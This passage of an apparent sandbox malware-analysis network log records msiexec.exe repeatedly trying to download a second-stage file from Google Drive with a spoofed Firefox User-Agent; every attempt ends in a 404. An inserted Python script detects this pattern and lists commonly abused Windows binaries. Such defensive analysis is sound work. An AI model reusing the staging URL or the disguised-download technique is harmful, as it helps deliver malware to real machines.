                                                          X-GUploader-UploadID: AFIdbgRVnzEkubO4dxbA2c_lHNNHU3gkwu5Z3a1mx4YHq7MsJCThrEt1Ygk9IlRJd0sRz5pP
                                                          Content-Type: text/html; charset=utf-8
                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                          Pragma: no-cache
                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                          Date: Sat, 11 Jan 2025 00:30:45 GMT
                                                          P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                          Content-Security-Policy: script-src 'nonce-O8EOhVgXzqVX_3tCzStGeA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                          Cross-Origin-Opener-Policy: same-origin
                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                          Content-Length: 1652
                                                          Server: UploadServer
                                                          Set-Cookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY; expires=Sun, 13-Jul-2025 00:30:45 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Content-Security-Policy: sandbox allow-scripts
                                                          Connection: close
                                                          2025-01-11 00:30:45 UTC | 1652 | IN | Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 68 56 5f 47 56 33 55 53 47 51 34 46 4b 35 6f 57 46 6d 30 32 53 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="hV_GV3USGQ4FK5oWFm02Sw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          2 | 192.168.2.9 | 49976 | 142.250.184.206 | 443 | 3848 | C:\Windows\SysWOW64\msiexec.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          2025-01-11 00:30:46 UTC | 417 | OUT | GET /uc?export=download&id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                          Host: drive.google.com
                                                          Cache-Control: no-cache
                                                          Cookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
                                                          2025-01-11 00:30:46 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                          Content-Type: application/binary
                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                          Pragma: no-cache
                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                          Date: Sat, 11 Jan 2025 00:30:46 GMT
                                                          Location: https://drive.usercontent.google.com/download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download
                                                          Strict-Transport-Security: max-age=31536000
                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                          Content-Security-Policy: script-src 'nonce-QW0iLIhqJ2KHitvxYieqiQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                          Cross-Origin-Opener-Policy: same-origin
                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                          Server: ESF
                                                          Content-Length: 0
                                                          X-XSS-Protection: 0
                                                          X-Frame-Options: SAMEORIGIN
                                                          X-Content-Type-Options: nosniff
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Connection: close


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          3 | 192.168.2.9 | 49977 | 142.250.181.225 | 443 | 3848 | C:\Windows\SysWOW64\msiexec.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          2025-01-11 00:30:47 UTC | 459 | OUT | GET /download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                          Cache-Control: no-cache
                                                          Host: drive.usercontent.google.com
                                                          Connection: Keep-Alive
                                                          Cookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
                                                          2025-01-11 00:30:47 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                          X-GUploader-UploadID: AFIdbgSLAr3O-4BZf2vsFb4atsWpQh4euFalnzgm2yvrI01h8FRfh-TqMt56uXAcroKt4cLvKcAJvOM
                                                          Content-Type: text/html; charset=utf-8
                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                          Pragma: no-cache
                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                          Date: Sat, 11 Jan 2025 00:30:47 GMT
                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                          Content-Security-Policy: script-src 'nonce-3CsUnk7pfy73n0TI3cRNAQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                          Cross-Origin-Opener-Policy: same-origin
                                                          Content-Length: 1652
                                                          Server: UploadServer
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Content-Security-Policy: sandbox allow-scripts
                                                          Connection: close
                                                          2025-01-11 00:30:47 UTC | 1652 | IN | Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 45 37 6c 33 49 38 4a 46 50 63 7a 44 32 30 6c 32 63 6c 46 52 69 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="E7l3I8JFPczD20l2clFRiQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          4 | 192.168.2.9 | 49978 | 142.250.184.206 | 443 | 3848 | C:\Windows\SysWOW64\msiexec.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          2025-01-11 00:30:48 UTC | 417 | OUT | GET /uc?export=download&id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                          Host: drive.google.com
                                                          Cache-Control: no-cache
                                                          Cookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
                                                          2025-01-11 00:30:49 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                          Content-Type: application/binary
                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                          Pragma: no-cache
                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                          Date: Sat, 11 Jan 2025 00:30:48 GMT
                                                          Location: https://drive.usercontent.google.com/download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download
                                                          Strict-Transport-Security: max-age=31536000
                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                          Content-Security-Policy: script-src 'nonce-rZCgaB8HBBaTpFFhHQ76Wg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                          Cross-Origin-Opener-Policy: same-origin
                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                          Server: ESF
                                                          Content-Length: 0
                                                          X-XSS-Protection: 0
                                                          X-Frame-Options: SAMEORIGIN
                                                          X-Content-Type-Options: nosniff
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Connection: close


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          5 | 192.168.2.9 | 49979 | 142.250.181.225 | 443 | 3848 | C:\Windows\SysWOW64\msiexec.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          2025-01-11 00:30:49 UTC | 459 | OUT | GET /download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                          Cache-Control: no-cache
                                                          Host: drive.usercontent.google.com
                                                          Connection: Keep-Alive
                                                          Cookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
                                                          2025-01-11 00:30:50 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                          X-GUploader-UploadID: AFIdbgTthHzghFAjLo31iEBd0f8rL1r9I933PHGhW0XWEfQngDfehJsponJQcV6GRYOly3lq
                                                          Content-Type: text/html; charset=utf-8
                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                          Pragma: no-cache
                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                          Date: Sat, 11 Jan 2025 00:30:50 GMT
                                                          Cross-Origin-Opener-Policy: same-origin
                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                          Content-Security-Policy: script-src 'nonce-q-qoYC80koCl7JdYDmO4RQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                          Content-Length: 1652
                                                          Server: UploadServer
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Content-Security-Policy: sandbox allow-scripts
                                                          Connection: close
                                                          2025-01-11 00:30:50 UTC | 1652 | IN | Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 31 75 51 49 61 56 69 73 47 79 76 6a 32 4b 34 37 42 42 79 66 66 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="1uQIaVisGyvj2K47BByffw">*{margin:0;padding:0}html,code{font:15px/22px arial
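Sessions 0 to 5 above all follow the same pattern: msiexec.exe (PID 3848) requests the Google Drive file ID 1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP with a Firefox User-Agent, drive.google.com answers 303 to drive.usercontent.google.com, and that host answers 404, after which the process retries about two seconds later. Every attempt ended in 404, so the second stage was not retrieved during this analysis; what is detectable regardless of payload is the process/User-Agent mismatch and the retry loop. The Python below is an added example, not part of the Joe Sandbox report or its tooling: it rebuilds sessions 0 to 5 as constructed records (the UA, file ID, PID and process path are taken from the report), parses the request heads, and flags a non-browser process sending a browser UA, any fetch from a file-sharing host, and the same URL being re-requested without ever getting a 2xx. The host list, the process list, the 30-second window and the threshold of three requests are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Assumptions for this example: hosts commonly abused for staging a second
# stage, and Windows binaries that have no reason to send a browser User-Agent.
FILE_SHARING_HOSTS = {"drive.google.com", "drive.usercontent.google.com"}
NON_BROWSER_PROCS = {"msiexec.exe", "powershell.exe", "regsvr32.exe",
                     "rundll32.exe", "mshta.exe", "wscript.exe"}
BROWSER_UA = re.compile(r"Mozilla/5\.0 \(.*?\).*(?:Firefox|Chrome|Safari)/\d")

# Values taken from the report above
UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
FILE_ID = "1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP"
PROC = r"C:\Windows\SysWOW64\msiexec.exe"


def build_request(host, path):
    """Build a request head in the shape the report prints it."""
    return (f"GET {path} HTTP/1.1\r\nUser-Agent: {UA}\r\n"
            f"Host: {host}\r\nCache-Control: no-cache\r\n")


def build_sessions():
    """Constructed records mirroring sessions 0-5: a 303 from drive.google.com
    followed one second later by a 404 from drive.usercontent.google.com,
    repeated three times two seconds apart."""
    sessions = []
    for i in range(3):
        t0 = datetime(2025, 1, 11, 0, 30, 44) + timedelta(seconds=2 * i)
        sessions.append({"time": t0, "pid": 3848, "process": PROC,
                         "request": build_request("drive.google.com",
                                                  f"/uc?export=download&id={FILE_ID}"),
                         "status": "HTTP/1.1 303 See Other"})
        sessions.append({"time": t0 + timedelta(seconds=1), "pid": 3848, "process": PROC,
                         "request": build_request("drive.usercontent.google.com",
                                                  f"/download?id={FILE_ID}&export=download"),
                         "status": "HTTP/1.1 404 Not Found"})
    return sessions


SESSIONS = build_sessions()


def parse_request(raw):
    """Return (method, path, headers) from a raw HTTP/1.1 request head."""
    lines = raw.strip().splitlines()
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers


def status_code(status_line):
    """'HTTP/1.1 404 Not Found' -> 404"""
    return int(status_line.split()[1])


def analyze(sessions, loop_min=3, window=timedelta(seconds=30)):
    """Return de-duplicated findings: a non-browser process using a browser
    User-Agent, any fetch from a file-sharing host, and the same URL requested
    loop_min or more times inside `window` without ever getting a 2xx."""
    findings = set()
    per_target = defaultdict(list)
    for s in sessions:
        _method, path, hdrs = parse_request(s["request"])
        host = hdrs.get("host", "")
        proc = s["process"].rsplit("\\", 1)[-1].lower()
        code = status_code(s["status"])
        if proc in NON_BROWSER_PROCS and BROWSER_UA.search(hdrs.get("user-agent", "")):
            findings.add(("browser_ua_from_non_browser", s["pid"], proc, host))
        if host in FILE_SHARING_HOSTS:
            findings.add(("file_sharing_download", s["pid"], proc, host + path))
        per_target[(s["pid"], host + path)].append((s["time"], code))
    for (pid, url), hits in per_target.items():
        hits.sort()
        never_ok = not any(200 <= c < 300 for _, c in hits)
        if len(hits) >= loop_min and never_ok and hits[-1][0] - hits[0][0] <= window:
            findings.add(("retry_loop_without_success", pid, url, len(hits)))
    return sorted(findings, key=str)


if __name__ == "__main__":
    for finding in analyze(SESSIONS):
        print(*finding)
```

Run as a script it prints six findings: the UA mismatch for both Google hosts, the two file-sharing fetches, and one retry loop per URL (three requests each, none successful). Fed from a proxy log or a sandbox HTTP export instead of the constructed records, the same logic applies; the User-Agent on its own is unremarkable, so the useful signal is the process that sends it.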


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          6 | 192.168.2.9 | 49980 | 142.250.184.206 | 443 | 3848 | C:\Windows\SysWOW64\msiexec.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          2025-01-11 00:30:51 UTC | 417 | OUT | GET /uc?export=download&id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                          Host: drive.google.com
                                                          Cache-Control: no-cache
                                                          Cookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
                                                          2025-01-11 00:30:51 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                          Content-Type: application/binary
                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                          Pragma: no-cache
                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                          Date: Sat, 11 Jan 2025 00:30:51 GMT
                                                          Location: https://drive.usercontent.google.com/download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download
                                                          Strict-Transport-Security: max-age=31536000
                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                          Content-Security-Policy: script-src 'nonce-df7W7LxxKEjPeBIyq4LHMA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                          Cross-Origin-Opener-Policy: same-origin
                                                          Server: ESF
                                                          Content-Length: 0
                                                          X-XSS-Protection: 0
                                                          X-Frame-Options: SAMEORIGIN
                                                          X-Content-Type-Options: nosniff
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Connection: close


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          7 | 192.168.2.9 | 49981 | 142.250.181.225 | 443 | 3848 | C:\Windows\SysWOW64\msiexec.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          2025-01-11 00:30:52 UTC | 459 | OUT | GET /download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                          Cache-Control: no-cache
                                                          Host: drive.usercontent.google.com
                                                          Connection: Keep-Alive
                                                          Cookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
                                                          2025-01-11 00:30:52 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                          X-GUploader-UploadID: AFIdbgTN1rVcSYi8FPkd4o5jbhTQyMaGHo5DkWllHrBDAXiGvipyTiOxFPUEEcvSZxp3lm6tuyW5-DM
                                                          Content-Type: text/html; charset=utf-8
                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                          Pragma: no-cache
                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                          Date: Sat, 11 Jan 2025 00:30:52 GMT
                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                          Cross-Origin-Opener-Policy: same-origin
                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                          Content-Security-Policy: script-src 'nonce-V2244LTKCvkr3-H0g9eCxw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
